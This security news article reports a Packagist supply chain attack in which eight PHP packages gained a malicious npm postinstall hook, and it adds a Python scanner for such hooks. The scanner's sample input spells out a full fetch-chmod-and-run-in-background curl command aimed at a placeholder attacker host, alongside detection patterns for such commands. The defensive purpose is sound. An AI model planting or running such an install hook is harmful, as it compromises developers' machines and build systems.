Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
A coordinated supply chain attack on Packagist infected eight Composer packages with malicious code that executes a Linux binary hosted on GitHub Releases, targeting JavaScript projects alongside PHP dependencies.

A new coordinated supply chain attack campaign has impacted eight packages on Packagist, the main repository for PHP Composer packages, by injecting malicious code designed to download and execute a Linux binary hosted on GitHub Releases. The attack was discovered by application security firm Socket, which reported that the malicious versions have since been removed from the registry.
What makes this campaign particularly notable is its cross-ecosystem approach. Although the affected packages are all Composer packages for PHP, the malicious code was not added to `composer.json`—the expected metadata file for PHP dependencies. Instead, attackers inserted the payload into `package.json`, the metadata file used by JavaScript's npm ecosystem. This placement targets projects that ship JavaScript build tooling alongside PHP code, allowing the malware to evade security scans that focus solely on PHP-specific files.
The attack works by modifying the upstream repositories of the affected packages to include a `postinstall` script in `package.json`. When a developer installs the package, the script automatically downloads a Linux binary from a GitHub Releases URL (`github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f`), saves it to `/tmp/.sshd`, changes permissions using `chmod` to grant execute permissions to all users, and runs it in the background. The binary's name, "gvfsd-network," mimics a legitimate GNOME Virtual File System daemon, likely to avoid suspicion.
The eight affected packages and their compromised versions include: `moritz-sauer-13/silverstripe-cms-theme` (dev-master), `crosiersource/crosierlib-base` (dev-master), `devdojo/wave` (dev-main), `devdojo/genesis` (dev-main), `katanaui/katana` (dev-main), `elitedevsquad/sidecar-laravel` (3.x-dev), `r2luna/brain` (dev-main), and `baskarcm/tzi-chat-ui` (dev-main). Socket's investigation found references to the same payload across 777 files on GitHub, suggesting the campaign may be broader than initially reported. In at least two instances, the payload was added to GitHub workflow files, indicating the attacker was not relying on a single execution mechanism.
The exact nature of the second-stage binary remains unknown, as the GitHub account hosting the repository is no longer available. However, Socket warns that even without the binary, the malicious installer itself is dangerous. "It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background," the firm stated. This attack underscores the growing sophistication of supply chain threats that exploit cross-ecosystem blind spots, where security teams may overlook JavaScript hooks in PHP packages.
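The installer behaviour described above (a `postinstall` hook in a PHP package's `package.json` that fetches a binary from GitHub Releases, drops it as a hidden file under `/tmp`, makes it executable, runs it in the background, disables TLS verification and suppresses errors) can be turned into a review check over a Composer `vendor/` tree. The Python below is an added example written for this article, not code from Socket or from any of the affected projects; the indicator regexes, the `scan_composer_vendor` walk and the sample `package.json` contents (including the `EXAMPLE-ATTACKER` URL placeholder) are constructed for illustration and are heuristics rather than signatures from the report.

```python
import json
import os
import re
from typing import Dict, List

# npm lifecycle hooks that run automatically during install; the campaign
# described in the article abused "postinstall".
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed heuristics for the behaviours the article attributes to the
# installer. Each hit is a reason to read the hook by hand, not proof of
# compromise (build tooling occasionally downloads things too).
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "remote_download": re.compile(r"\b(curl|wget)\b"),
    "github_releases_url": re.compile(r"github\.com/[^\s'\"]+/releases/download/"),
    "hidden_tmp_path": re.compile(r"/tmp/\.[^\s/]+"),
    "chmod_exec": re.compile(r"\bchmod\s+(?:[ugoa]*\+[rwx]+|[0-7]{3,4})\b"),
    # a lone '&' (not '&&', not '2>&1'), or nohup/setsid: run in the background
    "background_exec": re.compile(r"(?<![&>])&(?![&>0-9])|\bnohup\b|\bsetsid\b"),
    "tls_disabled": re.compile(
        r"--insecure|--no-check-certificate|NODE_TLS_REJECT_UNAUTHORIZED=0|\s-[A-Za-z]*k\b"
    ),
    "error_suppressed": re.compile(r"2>\s*/dev/null|\|\|\s*true"),
}


def scan_package_json(text: str) -> List[Dict[str, str]]:
    """Return one finding per (lifecycle hook, indicator) hit in a package.json."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        # A package.json that does not parse is itself worth a look.
        return [{"hook": "-", "indicator": "unparseable_json", "script": ""}]
    scripts = data.get("scripts") if isinstance(data, dict) else None
    if not isinstance(scripts, dict):
        return []
    findings: List[Dict[str, str]] = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(cmd):
                findings.append({"hook": hook, "indicator": name, "script": cmd})
    return findings


def risk_level(findings: List[Dict[str, str]]) -> str:
    """'high' when an install hook both fetches and executes something."""
    names = {f["indicator"] for f in findings}
    if not names:
        return "clean"
    if "remote_download" in names and ("chmod_exec" in names or "background_exec" in names):
        return "high"
    return "review"


def scan_composer_vendor(root: str) -> Dict[str, List[Dict[str, str]]]:
    """Walk a Composer vendor/ tree and scan every package.json found in a
    PHP dependency: the cross-ecosystem blind spot the article describes."""
    results: Dict[str, List[Dict[str, str]]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]
        if "package.json" in filenames:
            path = os.path.join(dirpath, "package.json")
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_package_json(fh.read())
            if findings:
                results[path] = findings
    return results


# Constructed sample inputs: a normal theme package and one carrying an
# install hook shaped like the behaviour described in the article.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-theme",
    "scripts": {"build": "vite build", "postinstall": "husky install"},
})
SUSPICIOUS_PACKAGE_JSON = json.dumps({
    "name": "example-theme",
    "scripts": {
        "build": "vite build",
        "postinstall": (
            "curl -sk https://github.com/EXAMPLE-ATTACKER/EXAMPLE-REPO"
            "/releases/download/v1/gvfsd-network -o /tmp/.sshd 2>/dev/null"
            " && chmod 777 /tmp/.sshd && /tmp/.sshd &"
        ),
    },
})

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_PACKAGE_JSON), ("suspicious", SUSPICIOUS_PACKAGE_JSON)):
        hits = scan_package_json(text)
        print(label, risk_level(hits), sorted(h["indicator"] for h in hits))
    # Real use: scan_composer_vendor("vendor") after `composer install`,
    # before any `npm install` runs the hooks.
```

Run `scan_composer_vendor("vendor")` after `composer install` and before any JavaScript install step executes the hooks; a `high` result means a PHP dependency would fetch something from the network and execute it as part of an ordinary build, which is the property to escalate regardless of what the second-stage binary turns out to be.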